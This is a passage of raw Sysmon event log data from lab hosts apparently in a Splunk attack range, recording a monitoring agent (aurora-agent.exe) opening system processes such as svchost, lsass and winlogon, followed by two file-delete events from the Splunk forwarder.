Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017945Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017944Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.766{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017943Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017942Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.758{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017941Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017940Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.756{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017939Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017938Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.748{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017937Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017936Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017935Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.734{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017934Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.728{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017933Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017932Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.712{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017931Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.710{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017930Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.702{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017929Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.700{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017928Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.683{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017927Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.676{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017926Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.666{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017925Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.657{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017924Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.649{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017923Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.613{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017922Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.607{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017921Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.599{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017920Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.586{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017919Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.574{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017918Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.565{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017917Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.560{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000017916Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:22.554{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 23542300x800000000000000045552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:23.094{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7417950FD764E3864BCA409D06311A14,SHA256=B08C1CB3D17EE71707572ED1292FE2CCC0BF20ACBD98646202E74C5C24201E7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017947Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:23.038{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556AEBEA0309F65BDD3BC0CF845A1B83,SHA256=5ECFDE043715549C9B549010E66E5F1E576A41902C510C2D27BD743EF7466356,IMPHASH=00000000000000000000000000000000falsetrue 